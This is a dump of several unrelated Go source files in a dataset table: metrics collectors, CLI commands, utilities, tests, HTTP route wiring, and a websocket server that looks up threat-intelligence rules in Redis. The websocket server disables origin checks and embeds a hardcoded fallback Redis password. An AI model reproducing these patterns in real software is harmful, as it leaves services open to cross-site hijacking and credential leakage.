text stringlengths 11 4.05M |
|---|
package LICY_BLC
import "fmt"
func (cli *Licy_CLI) Licy_getBalance(address string) {
blockchain := Licy_GetBlochChainObject()
defer blockchain.Licy_DB.Close()
utxoSet := &Licy_UTXOSet{blockchain}
amount := utxoSet.Licy_GetBalance(address)
fmt.Printf("%s一共有%d个Token\n",address,amount)
} |
package main
import (
"log"
"time"
confluent "github.com/confluentinc/confluent-kafka-go/kafka"
"github.com/etf1/kafka-transformer/pkg/instrument"
"github.com/prometheus/client_golang/prometheus"
)
// promCollector implements instrument.Collector by mirroring every pipeline
// stage (consume, transform, produce, project, overall) into a Prometheus
// gauge, counter and histogram, all labelled by collector name and status.
type promCollector struct {
	name string
	// most recent duration per stage
	consumeDurationGauge, transformDurationGauge, produceDurationGauge, projectDurationGauge, overallDurationGauge *prometheus.GaugeVec
	// total message count per stage
	consumeCounter, transformCounter, produceCounter, projectCounter, overallCounter *prometheus.CounterVec
	// duration distribution per stage
	consumeDurationHistogram, transformDurationHistogram, produceDurationHistogram, projectDurationHistogram, overallDurationHistogram *prometheus.HistogramVec
}
// NewCollector create a prometheus collector
func NewCollector(name string) instrument.Collector {
pc := promCollector{
name: name,
// gauges
consumeDurationGauge: prometheus.NewGaugeVec(
prometheus.GaugeOpts{
Namespace: "kafka_transformer",
Name: "consume_gauge_duration_seconds",
Help: "Current consume duration in seconds",
},
[]string{"name", "status"},
),
transformDurationGauge: prometheus.NewGaugeVec(
prometheus.GaugeOpts{
Namespace: "kafka_transformer",
Name: "transform_gauge_duration_seconds",
Help: "Current transform duration in seconds",
},
[]string{"name", "status"},
),
produceDurationGauge: prometheus.NewGaugeVec(
prometheus.GaugeOpts{
Namespace: "kafka_transformer",
Name: "produce_gauge_duration_seconds",
Help: "Current produce duration in seconds",
},
[]string{"name", "status"},
),
projectDurationGauge: prometheus.NewGaugeVec(
prometheus.GaugeOpts{
Namespace: "kafka_transformer",
Name: "project_gauge_duration_seconds",
Help: "Current project duration in seconds",
},
[]string{"name", "status"},
),
overallDurationGauge: prometheus.NewGaugeVec(
prometheus.GaugeOpts{
Namespace: "kafka_transformer",
Name: "overall_gauge_duration_seconds",
Help: "Current overall duration in seconds",
},
[]string{"name", "status"},
),
// counters
consumeCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Namespace: "kafka_transformer",
Name: "consume_counter_total",
Help: "The number of consumed messages from a kafka topic",
},
[]string{"name", "status"},
),
transformCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Namespace: "kafka_transformer",
Name: "transform_counter_total",
Help: "The number of transformed messages",
},
[]string{"name", "status"},
),
produceCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Namespace: "kafka_transformer",
Name: "produce_counter_total",
Help: "The number of produced messages to a kafka topic",
},
[]string{"name", "status"},
),
projectCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Namespace: "kafka_transformer",
Name: "project_counter_total",
Help: "The number of projected messages",
},
[]string{"name", "status"},
),
overallCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Namespace: "kafka_transformer",
Name: "overall_counter_total",
Help: "The number of messages processed by the transformer from consumption to projection",
},
[]string{"name", "status"},
),
// histograms
consumeDurationHistogram: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Namespace: "kafka_transformer",
Name: "consume_hist_duration_seconds",
Help: "The consumption duration in seconds",
},
[]string{"name", "status"},
),
transformDurationHistogram: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Namespace: "kafka_transformer",
Name: "transform_hist_duration_seconds",
Help: "The transformed duration in seconds",
},
[]string{"name", "status"},
),
produceDurationHistogram: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Namespace: "kafka_transformer",
Name: "produce_hist_duration_seconds",
Help: "The produced duration in seconds",
},
[]string{"name", "status"},
),
projectDurationHistogram: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Namespace: "kafka_transformer",
Name: "project_hist_duration_seconds",
Help: "The projection duration in seconds",
},
[]string{"name", "status"},
),
overallDurationHistogram: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Namespace: "kafka_transformer",
Name: "overall_hist_duration_seconds",
Help: "The overall duration in seconds",
},
[]string{"name", "status"},
),
}
prometheus.MustRegister(pc.consumeDurationGauge, pc.transformDurationGauge, pc.produceDurationGauge, pc.projectDurationGauge, pc.overallDurationGauge)
prometheus.MustRegister(pc.consumeCounter, pc.transformCounter, pc.produceCounter, pc.projectCounter, pc.overallCounter)
prometheus.MustRegister(pc.consumeDurationHistogram, pc.transformDurationHistogram, pc.produceDurationHistogram, pc.projectDurationHistogram, pc.overallDurationHistogram)
return &pc
}
// Before logs the start of an instrumented action; no metric is recorded
// until After runs.
func (p promCollector) Before(message *confluent.Message, action instrument.Action, start time.Time) {
	log.Printf("PromCollector Before: %v %v %v", message, action, start)
}
// After records metrics for a completed action: it derives a success/failed
// status from err, then updates the gauge, counter and histogram matching
// the action with the time elapsed since start. Unknown actions are ignored.
func (p promCollector) After(message *confluent.Message, action instrument.Action, err error, start time.Time) {
	// Capture the end time before logging so log latency is not billed to
	// the measured action.
	now := time.Now()
	log.Printf("PromCollector After: %v %v %v %v", message, action, err, start)
	status := "success"
	if err != nil {
		status = "failed"
	}
	var (
		gauge   *prometheus.GaugeVec
		counter *prometheus.CounterVec
		hist    *prometheus.HistogramVec
	)
	switch action {
	case instrument.KafkaConsumerConsume:
		gauge, counter, hist = p.consumeDurationGauge, p.consumeCounter, p.consumeDurationHistogram
	case instrument.TransformerTransform:
		gauge, counter, hist = p.transformDurationGauge, p.transformCounter, p.transformDurationHistogram
	case instrument.KafkaProducerProduce:
		gauge, counter, hist = p.produceDurationGauge, p.produceCounter, p.produceDurationHistogram
	case instrument.ProjectorProject:
		gauge, counter, hist = p.projectDurationGauge, p.projectCounter, p.projectDurationHistogram
	case instrument.OverallTime:
		gauge, counter, hist = p.overallDurationGauge, p.overallCounter, p.overallDurationHistogram
	}
	// Compute the elapsed time once instead of re-deriving it per metric.
	elapsed := now.Sub(start).Seconds()
	if gauge != nil {
		gauge.WithLabelValues(p.name, status).Set(elapsed)
	}
	if counter != nil {
		counter.WithLabelValues(p.name, status).Inc()
	}
	if hist != nil {
		hist.WithLabelValues(p.name, status).Observe(elapsed)
	}
}
|
package main
import "fmt"
// main demonstrates Go slice expressions by printing several sub-slices of
// the same underlying array.
func main() {
	values := []int{42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52}
	// Each pair is a [low, high) bound applied to the same slice.
	for _, b := range [][2]int{{0, 5}, {5, 10}, {2, 7}, {1, 6}} {
		fmt.Println(values[b[0]:b[1]])
	}
}
|
package states
import (
"context"
"errors"
"fmt"
"time"
derrors "github.com/direktiv/direktiv/pkg/flow/errors"
log "github.com/direktiv/direktiv/pkg/flow/internallogger"
"github.com/direktiv/direktiv/pkg/model"
"github.com/senseyeio/duration"
)
// init registers the Delay constructor for the 'delay' state type.
func init() {
	RegisterState(model.StateTypeDelay, Delay)
}
// delayLogic implements the Logic interface for the 'delay' state, combining
// the state's model definition with the running workflow instance.
type delayLogic struct {
	*model.DelayState
	Instance
}
// Delay initializes the logic for executing a 'delay' state in a Direktiv workflow instance.
func Delay(instance Instance, state model.State) (Logic, error) {
	delayState, ok := state.(*model.DelayState)
	if !ok {
		return nil, derrors.NewInternalError(errors.New("bad state object"))
	}

	logic := &delayLogic{
		DelayState: delayState,
		Instance:   instance,
	}
	return logic, nil
}
// Deadline overwrites the default underlying Deadline function provided by Instance because
// Delay is a multi-step state.
func (logic *delayLogic) Deadline(ctx context.Context) time.Time {
	d, err := duration.ParseISO8601(logic.Duration)
	if err != nil {
		// Unparseable duration: log it and fall back to the short default.
		logic.Log(ctx, log.Error, "failed to parse duration: %v", err)
		return time.Now().UTC().Add(DefaultShortDeadline)
	}
	// Shift the configured delay from now plus a short grace period, so the
	// deadline always exceeds the sleep itself.
	t := d.Shift(time.Now().UTC().Add(DefaultShortDeadline))
	return t
}
// Run implements the Run function for the Logic interface.
//
// The 'delay' state does nothing except pause the workflow for a specified length of time. To
// achieve this, the state must be scheduled in twice. The first time Run is called the state
// schedules its own wakeup. The second time Run is called should be in response to the scheduled
// wakeup.
//
// In every other way, the 'delay' state is equivalent to the 'noop' state. It should only fail
// if performs unnecessary validation on its arguments and finds them broken.
func (logic *delayLogic) Run(ctx context.Context, wakedata []byte) (*Transition, error) {
	// scheduleTwiceConst distinguishes the initial invocation from the wakeup.
	first, err := scheduleTwiceConst(logic, wakedata, `""`)
	if err != nil {
		return nil, err
	}
	if first {
		// First pass: parse the ISO8601 duration and schedule the wakeup.
		var d duration.Duration
		d, err = duration.ParseISO8601(logic.Duration)
		if err != nil {
			return nil, derrors.NewInternalError(fmt.Errorf("failed to parse delay duration: %w", err))
		}
		t0 := time.Now().UTC()
		t := d.Shift(t0)
		err = logic.Sleep(ctx, t.Sub(t0), "")
		if err != nil {
			return nil, err
		}
		// No transition yet: the state is waiting for its wakeup.
		//nolint:nilnil
		return nil, nil
	}
	// Second pass (wakeup): transition to the configured next state.
	logic.Log(ctx, log.Info, "Waking up from sleep.")
	return &Transition{
		Transform: logic.Transform,
		NextState: logic.Transition,
	}, nil
}
|
package bsutils
import (
"strconv"
"time"
)
// StringToIntWithDefault converts s to an int, falling back to def when s is
// not a valid integer.
func StringToIntWithDefault(s string, def int) int {
	if v, err := strconv.Atoi(s); err == nil {
		return v
	}
	return def
}
// StringToInt64WithDefault converts s to a base-10 int64, falling back to
// def when s cannot be parsed.
func StringToInt64WithDefault(s string, def int64) int64 {
	if v, err := strconv.ParseInt(s, 10, 64); err == nil {
		return v
	}
	return def
}
// StringToFloat64WithDefault converts s to a float64, falling back to def
// when s cannot be parsed.
func StringToFloat64WithDefault(s string, def float64) float64 {
	if v, err := strconv.ParseFloat(s, 64); err == nil {
		return v
	}
	return def
}
func StringToDateWithDefault(s string, def time.Time, formats ...string) time.Time {
if len(formats) == 0 {
formats = []string{}
}
formats = append(formats, time.RFC3339, time.RFC3339Nano, time.RFC1123Z, time.RFC1123)
for _, f := range formats {
if t, err := time.Parse(f, s); err == nil {
return t
}
}
return def
}
|
// Copyright (c) 2020 by meng. All rights reserved.
// Use of this source code is governed by an MIT-style
// license that can be found in the LICENSE file.
/**
* @Author: meng
* @Description:
* @File: behavior_Work
* @Version: 1.0.0
* @Date: 2020/4/15 01:05
*/
package base_behavior
import (
"fmt"
"github.com/mx5566/behavior-tree/common"
)
// BehaviorWork is a stateless leaf node of the behavior tree; its lifecycle
// hooks are OnInitialize, Update and OnTerminate.
type BehaviorWork struct {
}
// OnInitialize is invoked before the node's Update runs. BehaviorWork needs
// no setup, so it is a no-op.
func (w *BehaviorWork) OnInitialize(inter interface{}) {
}
// Update performs the node's actual work and reports the resulting status.
// This placeholder implementation only prints a trace line and reports
// Status_Invalid.
func (w *BehaviorWork) Update(inter interface{}) common.StatusType {
	fmt.Println("BaseBehavior Update Address ")
	return common.Status_Invalid
}
// OnTerminate is invoked after Update finishes with the node's final status.
// BehaviorWork needs no teardown, so it is a no-op.
func (w *BehaviorWork) OnTerminate(statusType common.StatusType) {
}
|
package render
import (
"fmt"
"github.com/spf13/cobra"
"github.com/werf/werf/cmd/werf/common"
"github.com/werf/werf/pkg/config"
"github.com/werf/werf/pkg/git_repo"
"github.com/werf/werf/pkg/git_repo/gitdata"
"github.com/werf/werf/pkg/true_git"
"github.com/werf/werf/pkg/werf"
)
// commonCmdData holds the shared flag values wired up by the common.Setup*
// calls in NewCmd and read back when the command runs.
var commonCmdData common.CmdData
// NewCmd builds the `werf render` cobra command, which initializes werf and
// its git machinery and then renders werf.yaml for the requested images.
func NewCmd() *cobra.Command {
	cmd := &cobra.Command{
		Use:                   "render [IMAGE_NAME...]",
		DisableFlagsInUseLine: true,
		Short:                 "Render werf.yaml",
		RunE: func(cmd *cobra.Command, args []string) error {
			ctx := common.BackgroundContext()
			if err := common.ProcessLogOptions(&commonCmdData); err != nil {
				common.PrintHelp(cmd)
				return err
			}
			// Wrap with %w (not %s) so callers can unwrap the cause.
			if err := werf.Init(*commonCmdData.TmpDir, *commonCmdData.HomeDir); err != nil {
				return fmt.Errorf("initialization error: %w", err)
			}
			gitDataManager, err := gitdata.GetHostGitDataManager(ctx)
			if err != nil {
				return fmt.Errorf("error getting host git data manager: %w", err)
			}
			if err := git_repo.Init(gitDataManager); err != nil {
				return err
			}
			if err := true_git.Init(true_git.Options{LiveGitOutput: *commonCmdData.LogVerbose || *commonCmdData.LogDebug}); err != nil {
				return err
			}
			giterminismManager, err := common.GetGiterminismManager(&commonCmdData)
			if err != nil {
				return err
			}
			configOpts := common.GetWerfConfigOptions(&commonCmdData, false)
			customWerfConfigRelPath, err := common.GetCustomWerfConfigRelPath(giterminismManager, &commonCmdData)
			if err != nil {
				return err
			}
			customWerfConfigTemplatesDirRelPath, err := common.GetCustomWerfConfigTemplatesDirRelPath(giterminismManager, &commonCmdData)
			if err != nil {
				return err
			}
			// Reuse ctx instead of creating a second background context.
			return config.RenderWerfConfig(ctx, customWerfConfigRelPath, customWerfConfigTemplatesDirRelPath, args, giterminismManager, configOpts)
		},
	}
	common.SetupDir(&commonCmdData, cmd)
	common.SetupGitWorkTree(&commonCmdData, cmd)
	common.SetupConfigTemplatesDir(&commonCmdData, cmd)
	common.SetupConfigPath(&commonCmdData, cmd)
	common.SetupEnvironment(&commonCmdData, cmd)
	common.SetupGiterminismOptions(&commonCmdData, cmd)
	common.SetupTmpDir(&commonCmdData, cmd)
	common.SetupHomeDir(&commonCmdData, cmd)
	common.SetupLogOptions(&commonCmdData, cmd)
	return cmd
}
|
package gherkin
import (
"testing"
. "github.com/tychofreeman/go-matchers"
"io"
)
// MockScenario is a test double for Scenario that returns a canned Report.
type MockScenario struct {
	rpt Report
}
// AddStep is a no-op: the mock ignores any steps added to it.
func (ms MockScenario) AddStep(s step) {
}

// Last reports no prior step.
func (ms MockScenario) Last() *step {
	return nil
}

// Execute ignores its inputs and returns the canned report.
func (ms MockScenario) Execute([]stepdef, io.Writer, interface{}) Report {
	return ms.rpt
}

// IsBackground marks the mock as a regular (non-background) scenario.
func (ms MockScenario) IsBackground() bool {
	return false
}

// IsJustPrintable marks the mock as executable rather than print-only.
func (ms MockScenario) IsJustPrintable() bool {
	return false
}
// TestReportsNumberOfScenarios verifies that executing one scenario yields a
// report counting exactly one scenario.
func TestReportsNumberOfScenarios(t *testing.T) {
	scenarios := []Scenario{
		MockScenario{rpt: Report{0, 0, 0, 1, 0, 0}},
	}
	r := createWriterlessRunner()
	rpt := r.executeScenarios(scenarios)
	AssertThat(t, rpt.scenarioCount, Equals(1))
}
// TestReportsNumberOfStepsInScenarios verifies that the per-step counters
// (pending, skipped, passed, failed) from a scenario's report are aggregated
// into the runner's report.
func TestReportsNumberOfStepsInScenarios(t *testing.T) {
	scenarios := []Scenario{
		MockScenario{rpt: Report{0, 2, 2, 2, 2, 2}},
	}
	r := createWriterlessRunner()
	rpt := r.executeScenarios(scenarios)
	AssertThat(t, rpt.pendingSteps, Equals(2))
	AssertThat(t, rpt.skippedSteps, Equals(2))
	AssertThat(t, rpt.passedSteps, Equals(2))
	AssertThat(t, rpt.failedSteps, Equals(2))
}
|
// @SubApi 喵喵喵 [/Cat]
package api
import (
"bytes"
"net/http"
"strconv"
ren "github.com/hmgle/swagger-demo/src/render"
)
// @Title api.Miao
// @Description 喵
// @Resource Cat
// @Accept json
// @Param count query int false "喵几声?"
// @Success 200 {string} string "返回"
// @Router /miao [get]
func Miao(w http.ResponseWriter, r *http.Request) {
	count, err := strconv.Atoi(r.URL.Query().Get("count"))
	if err != nil {
		ren.Text(w, http.StatusOK, "喵...")
		return
	}
	var meows bytes.Buffer
	for i := 0; i < count; i++ {
		meows.WriteString("喵~")
	}
	ren.Text(w, http.StatusOK, meows.String())
}
|
package main
import (
"bufio"
"bytes"
"fmt"
"math"
"os"
"strconv"
"strings"
)
// main reads two integers L and R from stdin and prints the maximum XOR of
// any pair (i, j) with L <= i, j <= R.
func main() {
	s := bufio.NewScanner(os.Stdin)
	buff := new(bytes.Buffer)
	// Allow input lines up to 10^5 bytes.
	// Fix: the original named this `max` via := and then redeclared
	// `var max int` in the same scope — a compile error.
	bufSize := int(math.Pow(10, 5))
	buff.Grow(bufSize)
	s.Buffer(buff.Bytes(), bufSize)
	s.Scan()
	fields := strings.Split(s.Text(), " ")
	l, _ := strconv.Atoi(fields[0])
	r, _ := strconv.Atoi(fields[1])
	fmt.Println(maxXor(l, r))
}

// maxXor brute-forces the maximum of i^j over all pairs in [l, r].
func maxXor(l, r int) int {
	best := 0
	for i := l; i <= r; i++ {
		for j := l; j <= r; j++ {
			if x := i ^ j; x > best {
				best = x
			}
		}
	}
	return best
}
|
package main
import (
"net/http"
"github.com/souhub/wecircles/pkg/route"
)
// main wires every wecircles route onto the default mux, serves the static
// assets, and listens on port 80.
func main() {
	// Static assets under /static/, plus a dedicated CSS mount.
	files := http.FileServer(http.Dir("web/"))
	http.Handle("/static/", http.StripPrefix("/static/", files))
	// CSS読み込み用
	http.Handle("/resources/", http.StripPrefix("/resources/", http.FileServer(http.Dir("web/css/"))))
	http.HandleFunc("/", route.Index)
	http.HandleFunc("/about", route.About)
	http.HandleFunc("/login", route.Login)
	http.HandleFunc("/signup", route.Signup)
	http.HandleFunc("/signup_account", route.SignupAccount)
	http.HandleFunc("/authenticate", route.Authenticate)
	http.HandleFunc("/logout", route.Logout)
	http.HandleFunc("/post/new", route.NewPost)
	http.HandleFunc("/post/create", route.CreatePost)
	http.HandleFunc("/posts/manage", route.PostsManage)
	http.HandleFunc("/post", route.ShowPost)
	http.HandleFunc("/post/edit", route.EditPost)
	http.HandleFunc("/post/update", route.UpdatePost)
	http.HandleFunc("/post/delete", route.DeletePost)
	http.HandleFunc("/user/edit", route.EditUser)
	http.HandleFunc("/user/update", route.UpdateUser)
	http.HandleFunc("/user", route.User)
	http.HandleFunc("/user/delete/confirm", route.DeleteUserConfirm)
	http.HandleFunc("/user/delete", route.DeleteUser)
	http.HandleFunc("/circle", route.Circle)
	http.HandleFunc("/circles", route.Circles)
	http.HandleFunc("/circle/manage", route.CircleManage)
	http.HandleFunc("/circle/manage/members", route.CircleManageMembers)
	http.HandleFunc("/circle/new", route.NewCircle)
	http.HandleFunc("/circle/create", route.CreateCircle)
	http.HandleFunc("/circle/edit", route.EditCircle)
	http.HandleFunc("/circle/update", route.UpdateCircle)
	http.HandleFunc("/circle/delete", route.DeleteCircle)
	http.HandleFunc("/circle/memberships", route.MembershipsCircles)
	http.HandleFunc("/circle/membership/create", route.MembershipsCircleCreate)
	http.HandleFunc("/circle/membership/delete", route.DeleteMembership)
	http.HandleFunc("/circle/membership/delete/byowner", route.DeleteMembershipByOwner)
	http.HandleFunc("/circle/tweets", route.TweetsCircle)
	http.HandleFunc("/circle/settings", route.SettingsCircle)
	http.HandleFunc("/chat/create", route.CreateChat)
	http.HandleFunc("/chat/delete", route.DeleteChat)
	// Surface a startup failure (e.g. port 80 already bound) instead of
	// exiting silently with the error discarded.
	if err := http.ListenAndServe(":80", nil); err != nil {
		panic(err)
	}
}
|
package main
import (
"bufio"
"errors"
"flag"
"fmt"
"html/template"
"net"
"net/http"
"net/rpc"
"os"
"os/exec"
"runtime/pprof"
"strings"
"sync"
"sync/atomic"
"syscall"
"time"
"github.com/garyburd/redigo/redis"
"github.com/gorilla/websocket"
"github.com/sirupsen/logrus"
)
const (
	HEAD_LEN      = 64 // fixed byte length of the opaque message header echoed back to clients
	TCP_QUICK_ACK = 1  // selector for setTcpOption: enable TCP_QUICKACK
	TCP_NO_DELAY  = 2  // selector for setTcpOption: enable TCP_NODELAY
)
// homeTemplate renders a minimal in-browser test page: it opens a websocket
// back to this server (the URL is injected as the sole template argument)
// and wires Open/Send/Close buttons plus an output area for echoed replies.
var homeTemplate = template.Must(template.New("").Parse(`
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script>
window.addEventListener("load", function(evt) {
var output = document.getElementById("output");
var input = document.getElementById("input");
var ws;
var print = function(message) {
var d = document.createElement("div");
d.innerHTML = message;
output.appendChild(d);
};
document.getElementById("open").onclick = function(evt) {
if (ws) {
return false;
}
ws = new WebSocket("{{.}}");
ws.onopen = function(evt) {
print("OPEN");
}
ws.onclose = function(evt) {
print("CLOSE");
ws = null;
}
ws.onmessage = function(evt) {
print("RESPONSE: " + evt.data);
}
ws.onerror = function(evt) {
print("ERROR: " + evt.data);
}
return false;
};
document.getElementById("send").onclick = function(evt) {
if (!ws) {
return false;
}
print("SEND: " + input.value);
ws.send(input.value);
return false;
};
document.getElementById("close").onclick = function(evt) {
if (!ws) {
return false;
}
ws.close();
return false;
};
});
</script>
</head>
<body>
<table>
<tr><td valign="top" width="50%">
<p>Click "Open" to create a connection to the server,
"Send" to send a message to the server and "Close" to close the connection.
You can change the message and send multiple times.
<p>
<form>
<button id="open">Open</button>
<button id="close">Close</button>
<p><input id="input" type="text" value="Hello world!">
<button id="send">Send</button>
</form>
</td><td valign="top" width="50%">
<div id="output"></div>
</td></tr></table>
</body>
</html>
`))
// upgrader turns HTTP requests into websocket connections.
// NOTE(review): CheckOrigin accepts every origin, which disables cross-site
// websocket hijacking protection — confirm this is intended.
var upgrader = websocket.Upgrader{
	CheckOrigin: func(r *http.Request) bool {
		return true
	},
}
// FAILED is the generic sentinel error returned by the rule lookups below.
var FAILED = errors.New("FAILED")

// File-system locations used by this server.
var RedisPasswordPath string = "/opt/nubosh/vmsec-ctrl/redis/conf/redis_threatInfo.conf"
var Cmd string = "/opt/nubosh/vmsec-ctrl/bin/aescrypt"
var MineRulesEnc string = "/opt/nubosh/vmsec-ctrl/data/ioc/mine.rules"
var MineRulesDec string = "/opt/nubosh/vmsec-ctrl/data/ioc/mine_dec.rules"
var LogFile string = "/opt/nubosh/commonlog/bin/log/websocket_server.log"
var CpuProfLogFile string = "/opt/nubosh/commonlog/bin/log/websocket_server_CPU_prof"
var MemProfLogFile string = "/opt/nubosh/commonlog/bin/log/websocket_server_Mem_prof"
var RedisPasswd string   // redis password extracted from the redis conf file
var gMineRules sync.Map  // local cache of rules for fast lookup
var gRedisConn sync.Map  // maps each websocket client to its redis connection
var gOutTimeCnt uint32   // count of lookups that exceeded the time budget
var log *logrus.Logger   // process-wide logging handle
var cpuProfFile *os.File // file handle for CPU profiling output
var memProfFile *os.File // file handle for memory profiling output
var logLevel = flag.Int("logLevel", 4, "Panic:0, Fatal:1, Error:2, Warn:3, Info:4, Debug:5, Trace:6. ex: -logLevel 5")
var addr = flag.String("addr", "localhost:33873", "http service address")

// RpcCmd is the receiver type whose methods are exposed over net/rpc for
// runtime debugging (profiling, log level).
type RpcCmd int

// RedisConn pairs a redis connection with its timeout statistics counter.
type RedisConn struct {
	conn        redis.Conn
	statTimeout uint32
}
/* echo serves one websocket client: each incoming message is a fixed-size
header followed by a lookup key; the rule value found for the key is sent
back with the original header prepended. */
func echo(w http.ResponseWriter, r *http.Request) {
	log.Debugf("recv:echo")
	c, err := upgrader.Upgrade(w, r, nil)
	if err != nil {
		log.Errorf("Upgrade error: %s", err)
		return
	}
	connnectRedis(c)
	setTcpOption(c.GetNetConn(), TCP_NO_DELAY)
	defer connClose(c)
	for {
		mt, message, err := c.ReadMessage()
		if err != nil {
			if websocket.IsUnexpectedCloseError(err, websocket.CloseGoingAway, websocket.CloseAbnormalClosure) {
				log.Errorf("IsUnexpectedCloseError : %s", err)
			}
			break
		}
		log.Debugf("recv: %+v, len:%d", message, len(message))
		if len(message) < HEAD_LEN {
			log.Debugf("message len should be > %d", HEAD_LEN)
			return
		}
		// First HEAD_LEN bytes are an opaque header echoed back verbatim;
		// the remainder is the lookup key.
		head := message[:HEAD_LEN]
		key := message[HEAD_LEN:]
		log.Debugf("key: %s", key)
		t := time.Now()
		val, _ := searchMineRules(string(key), c)
		tDur := time.Since(t)
		// 2000000 is a time.Duration in nanoseconds, i.e. 2ms: slower
		// lookups are counted as timeouts.
		if tDur > 2000000 {
			atomic.AddUint32(&gOutTimeCnt, 1)
			log.Warnf("get %s time out : %v cnt(%v)", key, tDur, gOutTimeCnt)
		}
		log.Debugf("data: %s", val)
		// NOTE(review): this append may reuse message's backing array and
		// overwrite the key bytes (already consumed above) — confirm intended.
		data := append(head[:], []byte(val)...)
		err = c.WriteMessage(mt, data)
		if err != nil {
			log.Errorf("write error: %s", err)
			break
		}
	}
}
// home serves the interactive websocket test page, pointing the page's
// websocket URL at this host's /websocket endpoint.
func home(w http.ResponseWriter, r *http.Request) {
	log.Debugf("Recv home: %s", r.Host)
	homeTemplate.Execute(w, "ws://"+r.Host+"/websocket")
}
// connnectRedis opens a redis connection for the given websocket client and
// caches it in gRedisConn; it is a no-op when a connection already exists.
// (Name kept as-is, including the typo, since callers reference it.)
func connnectRedis(c *websocket.Conn) {
	log.Debugf("conn %s connnect Redis", c.LocalAddr())
	if val, ok := gRedisConn.Load(c); ok {
		log.Warnf("%s redis already connected, %v", c.LocalAddr(), val)
		return
	}
	// The redundant `var err error` pre-declaration was removed: := below
	// introduces conn and err together.
	conn, err := redis.Dial("tcp", "127.0.0.1:9736", redis.DialPassword(RedisPasswd))
	if err != nil {
		log.Errorf("Connect to redis error: %s", err)
		return
	}
	gRedisConn.Store(c, RedisConn{conn, 0})
}
/* updateMineRuleLocal loads mine.rules into the local cache once at startup,
then refreshes it every 12 hours. Runs forever; intended as a goroutine. */
func updateMineRuleLocal() {
	loadMineRule()
	t := time.NewTicker(12 * time.Hour)
	defer t.Stop()
	// Idiomatic replacement for for{select{case <-t.C:}} with one channel.
	for range t.C {
		loadMineRule()
	}
}
/* loadMineRule decrypts mine.rules and loads every line into the gMineRules
local cache, keyed by the first '|'-separated field of the line. */
func loadMineRule() {
	var err error
	var wg sync.WaitGroup
	log.Debugf("Update mine.rules to local")
	/* mine.rules is stored encrypted; decrypt it first via the helper binary */
	cmd := exec.Command(Cmd, "-dec", MineRulesEnc, MineRulesDec)
	if err := cmd.Run(); err != nil {
		// Fix: the original Errorf had no format verb for err.
		log.Errorf("aescrypt dec failed: %s", err)
		return
	}
	// Drop all previous cache contents before reloading.
	gMineRules.Range(func(k, v interface{}) bool {
		gMineRules.Delete(k)
		return true
	})
	ch := make(chan string, 10000)
	rdDonech := make(chan bool)
	wg.Add(1)
	go func() {
		var cnt uint32
		defer wg.Done()
		for {
			select {
			case val := <-ch:
				key := strings.Split(val, "|")
				gMineRules.Store(key[0], (val + "|1")) // trailing flag: 1 = blacklist, 2 = whitelist
				cnt++
			default:
				// Channel momentarily empty: either more data arrives, or
				// the reader signals completion via rdDonech.
				select {
				case val := <-ch:
					key := strings.Split(val, "|")
					gMineRules.Store(key[0], (val + "|1"))
					cnt++
				case <-rdDonech:
					log.Debugf("WriteDone-- final write redis cnt:%d", cnt)
					return
				default:
					continue
				}
			}
		}
	}()
	file, err := os.Open(MineRulesDec)
	if err != nil {
		log.Fatal(err)
	}
	defer file.Close()
	scanner := bufio.NewScanner(file)
	scanner.Split(bufio.ScanLines)
	// Feed each non-empty line to the caching goroutine.
	for scanner.Scan() {
		// Fix: Trace does not format its arguments; Tracef does.
		log.Tracef("--scanner.Text()--:%s", scanner.Text())
		if len(scanner.Text()) > 0 {
			ch <- scanner.Text()
		}
	}
	rdDonech <- true
	wg.Wait()
	/* remove the decrypted copy of mine.rules */
	cmd = exec.Command("rm", "-r", "-f", MineRulesDec)
	if err := cmd.Run(); err != nil {
		log.Errorf("delete mine_dec.rules failed, %s", err)
		return
	}
}
/* setTcpOption sets TCP_QUICKACK or TCP_NODELAY on the underlying socket,
selected by t (TCP_QUICK_ACK / TCP_NO_DELAY). */
func setTcpOption(conn net.Conn, t int) {
	// Fix: checked type assertion instead of panicking on non-TCP conns.
	tcpConn, ok := conn.(*net.TCPConn)
	if !ok {
		log.Errorf("setTcpOption: not a TCP connection")
		return
	}
	f, err := tcpConn.File()
	if err != nil {
		log.Errorf("tcpConn File error: %s", err)
		return
	}
	// File() duplicates the descriptor; close the dup once the option is
	// set to avoid leaking one fd per connection.
	defer f.Close()
	if t == TCP_QUICK_ACK {
		err = syscall.SetsockoptInt(int(f.Fd()), syscall.IPPROTO_TCP, syscall.TCP_QUICKACK, 1)
	} else if t == TCP_NO_DELAY {
		err = syscall.SetsockoptInt(int(f.Fd()), syscall.IPPROTO_TCP, syscall.TCP_NODELAY, 1)
	}
	if err != nil {
		log.Errorf("setTcpOption ERROR: %s", err)
		return
	}
}
/* GetRedisPassword extracts the masterauth password from the redis config
file; it falls back to a built-in default when no masterauth line exists. */
func GetRedisPassword() string {
	file, err := os.Open(RedisPasswordPath)
	if err != nil {
		log.Fatal(err)
	}
	defer file.Close()
	scanner := bufio.NewScanner(file)
	scanner.Split(bufio.ScanLines)
	for scanner.Scan() {
		// Fix: Trace does not format its arguments; Tracef does.
		log.Tracef("GetRedisPassword --scanner.Text()--:%s\n", scanner.Text())
		if len(scanner.Text()) > 0 {
			if strings.Contains(scanner.Text(), "masterauth") {
				// Strip spaces, then take everything after "masterauth".
				tmpStr := scanner.Text()
				tmpStr = strings.Replace(tmpStr, " ", "", -1)
				pw := strings.Split(tmpStr, "masterauth")
				return pw[1]
			}
		}
	}
	// SECURITY(review): hardcoded fallback credential — consider failing
	// loudly instead of shipping a default password.
	return "ac401b00381832cfe560d811a4e7f665"
}
/* connClose releases the client's redis connection and closes the websocket. */
func connClose(c *websocket.Conn) {
	// Fix: close the cached redis connection too — deleting only the map
	// entry leaked one redis connection per client.
	if val, ok := gRedisConn.Load(c); ok {
		if rc, ok := val.(RedisConn); ok {
			rc.conn.Close()
		}
	}
	gRedisConn.Delete(c)
	c.Close()
}
